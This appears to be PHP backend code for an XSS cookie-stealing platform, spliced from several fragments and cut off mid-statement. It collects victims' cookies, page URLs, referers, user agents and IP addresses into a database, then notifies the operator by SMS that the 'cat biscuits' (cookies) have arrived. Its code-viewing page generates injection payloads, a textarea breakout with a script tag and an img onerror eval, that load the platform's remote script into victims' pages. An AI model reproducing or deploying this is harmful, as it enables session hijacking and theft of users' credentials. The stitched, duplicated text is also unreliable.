} } } /* 模块 end */ foreach ($keys as $key) { $content[$key] = Val($key, 'REQUEST'); } if (in_array('toplocation', $keys)) { $content['toplocation'] = !empty($content['toplocation']) ? $content['toplocation'] : $content['location']; } $judgeCookie = in_array('cookie', $keys) ? true : false; /* cookie hash */ $cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']); $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); if (!$judgeCookie || $cookieExisted <= 0) { //服务器获取的content $serverContent = array(); $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER']; $referers = @parse_url($serverContent['HTTP_REFERER']); $domain = $referers['host'] ? $referers['host'] : ''; $domain = StripStr($domain); $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']); $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']); $serverContent['REMOTE_ADDR'] = StripStr($_SERVER['HTTP_X_FORWARDED_FOR']); $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time()); $db->AutoExecute(Tb('project_content'), $values); } else { $db->Execute("UPDATE " . Tb('project_content') . " SET num=num+1,updateTime='" . time() . "' WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); } header("Location: {$_SERVER['HTTP_REFERER']} "); }
// Excerpt: tail of the module-assembly loop, then the setup of the "view code" page.
// The enclosing loops/conditions open before this excerpt, hence the unmatched closing braces.

// Decode the module's list of configurable keys (stored as JSON) into a PHP array.
// NOTE(review): json_decode() returns null on malformed JSON; the foreach below does not guard against that.
$setkeys = json_decode($module['setkeys'], true);
foreach ($setkeys as $setkey) {
    // Replace each {set.<key>} placeholder in the module code with the value stored under
    // "setkey_<module id>_<key>" in $moduleSetKeys.
    // NOTE(review): {$module[id]} uses an unquoted key inside curly-brace interpolation, so PHP
    // looks `id` up as a constant; PHP 8 raises an Error when that constant is undefined.
    // The same pattern appears in {$project[urlKey]} below. Prefer {$module['id']}.
    $module['code'] = str_replace('{set.' . $setkey . '}', $moduleSetKeys["setkey_{$module[id]}_{$setkey}"], $module['code']);
}
}
// Append the (placeholder-substituted) module code to the accumulated output.
$code .= $module['code'];
}
}
}
/* modules end */
/* project custom code */
// URL of the project's script endpoint; the appended time() value makes each generated URL distinct.
$codeurl = URL_ROOT . "/{$project[urlKey]}?" . time();
// The project's own code is appended after all module code.
$code .= $project['code'];
// Two pre-built embed snippets shown on the page. Each one is passed through StripStr()
// (defined outside this excerpt) before it is handed to the template.
// NOTE(review): presumably StripStr() HTML-escapes so the snippets render as inert text - confirm.
$scriptShow1 = StripStr("</textarea>'\"><script src=" . URL_ROOT . "/{$project[urlKey]}?" . time() . "></script>");
$code2 = 'var b=document.createElement("script");b.src="' . URL_ROOT . "/{$project[urlKey]}?" . '"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
$scriptShow2 = StripStr("</textarea>'\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/" . rawurlencode($code2) . "/.source));//>");
// Relative include: resolved through include_path / the current working directory.
include 'common.php';
$smarty = InitSmarty();
$smarty->assign('do', $do);
$smarty->assign('show', $show);
$smarty->assign('url', $url);
$smarty->assign('project', $project);
// NOTE(review): $code (module code + project code) and $project are assigned without passing
// through StripStr() here; confirm that project_viewcode.html escapes them on output, since
// they presumably hold user-authored script text.
$smarty->assign('code', $code);
$smarty->assign('codeurl', $codeurl);
$smarty->assign('scriptShow1', $scriptShow1);
$smarty->assign('scriptShow2', $scriptShow2);
$smarty->assign('projects', $projects);
$smarty->assign('modules', $modules);
$smarty->assign('ty', $ty);
// Render the page, then leave the enclosing switch case.
$smarty->display('project_viewcode.html');
break;
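/**
 * Val: fetch a submitted value from a request superglobal and apply a basic filter.
 *
 * Security notes for callers:
 *  - Filter type 2 (or any unrecognised type) returns the client-supplied value unchanged.
 *  - StripStr() is defined elsewhere in the project; NOTE(review): confirm exactly what it
 *    escapes. A generic string filter is not a substitute for parameterised SQL or for
 *    context-specific output escaping.
 *  - With $isArray = 0 the value may still be an array (e.g. a "name[]" request parameter);
 *    it is passed to the filter as-is.
 *
 * @param string     $name    Parameter name.
 * @param string     $method  Source: GET / POST / COOKIE / REQUEST / SERVER (case-insensitive).
 * @param string|int $type    Filter: 'string' or 0 => StripStr(), 'int' or 1 => intval(),
 *                            anything else (2) => no filtering.
 * @param int        $isArray 0 => treat as a single value, 1 => cast to array and filter each element.
 * @return mixed Filtered value; '' when $name is empty or not a string; a missing key or an
 *               unknown $method is treated as null before filtering.
 */
function Val($name, $method = 'GET', $type = 0, $isArray = 0)
{
    if (!is_string($name) || $name === '') {
        return '';
    }

    // Pick the source array. An unknown method yields an empty source instead of leaving
    // $value undefined.
    switch (strtoupper($method)) {
        case 'GET':
            $source = $_GET;
            break;
        case 'POST':
            $source = $_POST;
            break;
        case 'COOKIE':
            $source = $_COOKIE;
            break;
        case 'REQUEST':
            $source = $_REQUEST;
            break;
        case 'SERVER':
            $source = $_SERVER;
            break;
        default:
            $source = array();
            break;
    }

    // A missing key becomes null rather than triggering an undefined-index warning.
    $value = isset($source[$name]) ? $source[$name] : null;

    // Resolve the filter with strict comparisons. The previous loose switch matched every
    // non-numeric string (including 'int') against `case 0` on PHP < 8, so 'int' was
    // filtered as a string there.
    if ($type === 0 || $type === '0' || $type === 'string' || $type === null || $type === false) {
        $filter = 'StripStr';
    } elseif ($type === 1 || $type === '1' || $type === 'int') {
        $filter = 'intval';
    } else {
        // Documented contract: any other type means "do not filter".
        return $value;
    }

    if (intval($isArray) == 0) {
        return call_user_func($filter, $value);
    }

    return array_map($filter, (array) $value);
}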
$cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']); $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); if (!$judgeCookie || $cookieExisted <= 0) { //服务器获取的content $serverContent = array(); $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER']; $referers = @parse_url($serverContent['HTTP_REFERER']); $domain = $referers['host'] ? $referers['host'] : ''; $domain = StripStr($domain); $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']); $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']); $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; if ($user_ip == '') { $user_ip = $_SERVER['REMOTE_ADDR']; } $serverContent['REMOTE_ADDR'] = StripStr($user_ip); $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time()); //$db->AutoExecute(Tb('project_content'),$values); $judgeCookie = in_array('cookie', $keys) ? true : false; /* cookie hash */ $Getcookie = $content['cookie']; $db->AutoExecute(Tb('project_content'), $values); //Getcookie在上面的变量里 $uid = $project['userId']; $userInfo = $db->FirstRow("SELECT * FROM " . Tb('user') . " WHERE id={$uid}"); $msg = explode("|", $userInfo['message']); if ($userInfo['phone'] && $msg[1] == 1) { SendSMS('13800138000', '123456', $userInfo['phone'], "尊敬的" . $userInfo['userName'] . ",您在" . URL_ROOT . " 预订的猫饼干,Cookie:{$Getcookie}已经到货!详情请登陆:" . URL_ROOT . " 查看!"); //参数:发送的飞信号 飞信密码 } if ($userInfo['email'] && $msg[0] == 1) {